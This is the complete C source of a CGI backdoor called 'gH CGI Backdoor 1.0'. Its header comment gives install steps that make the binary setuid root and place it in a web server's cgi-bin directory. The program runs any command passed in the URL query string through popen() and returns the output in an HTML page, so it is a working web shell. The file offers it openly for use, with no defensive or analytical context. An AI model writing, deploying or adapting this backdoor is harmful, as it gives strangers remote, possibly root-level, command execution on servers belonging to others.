/*
* gH CGI Backdoor 1.0
*
* Install:
* -------------------------------
* % gcc -o gH.cgi gH-cgi.c
* % chown root.root gH.cgi
* % chmod 4755 gH.cgi
* -------------------------------
* Tested with apache 1.3.4
*
* Note: place gH.cgi in a cgi-bin directory
*
* blasphemy (cornoil@netscape.net)
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define TITLE "gH CGI Backdoor"
char x2c(char *what);
int header();
int footer();
int
main() {
FILE *out;
char *qs = (char *)malloc(256);
int x = 0, i = 0, c = 0, f = 0;
qs = getenv("QUERY_STRING");
if (qs != NULL) {
for (x = 0, i = 0; qs[i]; x++, i++) {
if ((qs[x] = qs[i]) == '%') {
qs[x] = x2c(&qs[i + 1]);
i += 2;
}
}
qs[x] = '\0';
for (x = 0; qs[x]; x++) {
if (qs[x] == '+') {
qs[x] = ' ';
}
}
header(qs);
out = popen(qs, "r");
if (out != NULL) {
while (c != EOF) {
c = fgetc(out);
if (c != EOF && c != '\0') {
printf("%c", (char) c);
f++;
}
}
pclose(out);
}
if (f == 0 && strcmp(qs, "") != 0)
printf("gH: %s: command not found\n", qs);
}
footer();
return(0);
}
char x2c(char *what)
{
register char digit;
digit = (what[0] >= 'A' ? ((what[0] & 0xdf) - 'A')+10 : (what[0] - '0'));
digit *= 16;
digit += (what[1] >= 'A' ? ((what[1] & 0xdf) - 'A')+10 : (what[1] - '0'));
return (digit);
}
int
header(char *qs) {
printf("Content-type: text/html\n\n");
printf("<html>\n<head><title>%s</title></head>\n", TITLE);
printf("<body bgcolor=\"#ffffff\">\n");
printf("<dir><h1>%s</h1>\n", TITLE);
printf("<ISINDEX prompt=\"Command to Execute: \">\n");
printf("<br><b>Command output:</b> [<em>%s</em>]\n", qs);
printf("<br><pre>\n");
}
int
footer() {
printf("</pre>\n</dir>\n</body></html>\n");
}
syntax highlighted by Code2HTML, v. 0.9.1